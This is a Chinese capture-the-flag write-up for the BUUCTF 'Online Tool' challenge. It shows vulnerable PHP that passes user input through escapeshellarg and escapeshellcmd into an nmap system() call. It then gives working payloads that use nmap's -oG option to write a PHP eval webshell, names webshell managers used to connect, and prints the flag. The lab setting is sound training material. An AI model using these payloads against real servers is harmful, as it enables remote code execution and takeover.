BUUCTF——Online Tool

进入靶场

<?phpif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}if(!isset($_GET['host'])) {highlight_file(__FILE__);
} else {$host = $_GET['host'];$host = escapeshellarg($host);$host = escapeshellcmd($host);$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);echo 'you are in sandbox '.$sandbox;@mkdir($sandbox);chdir($sandbox);echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

这段代码是接收用户通过GET请求传递的host参数，然后使用nmap工具对该主机进行扫描。同时，它会根据客户端的 IP 地址创建一个沙箱目录，扫描结果会在这个沙箱目录下输出。

主要看看escapeshellarg和escapeshellcmd函数
escapeshellarg() 将给字符串增加一个单引号并且能引用或者转义任何已经存在的单引号，这样以确保能够直接将一个字符串传入 shell 函数，并且还是确保安全的。对于用户输入的部分参数就应该使用这个函数。shell 函数包含exec()、system() 和执行运算符 。
escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec() 或 system() 函数，或者 执行操作符 之前进行转义。

构造一个一句话木马payload

?host='<?php @eval($_POST["cmd"]);?> -oG shell.php '
?host=' <?php eval($_POST["hack"]);?> -oG hack.php '

再拼接url

http://cd33caf8-8032-4c84-8da7-e2210086dff7.node5.buuoj.cn:81/e6305cd14dbe6e1fc4041d81cb3fc9ee/shell.php

再用哥斯拉连接一下

哥斯拉连接失败，看了一下，shell写的没毛病

玄学网安

换了蚁剑连了一下

连上了

找到flag

flag{0dec71f0-da5f-47b9-8f8a-afc9111a035e}

下播！